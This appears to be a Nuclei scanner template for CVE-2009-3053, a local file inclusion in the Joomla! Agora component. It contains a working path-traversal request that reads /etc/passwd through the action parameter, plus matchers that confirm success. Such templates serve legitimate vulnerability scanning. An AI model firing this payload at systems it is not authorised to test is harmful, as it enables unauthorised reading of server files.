37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: CVE-2009-3053
|
|
|
|
info:
|
|
name: Joomla! Agora 3.0.0b - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/9564
|
|
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2009-3053
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2009,joomla,lfi,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/06
|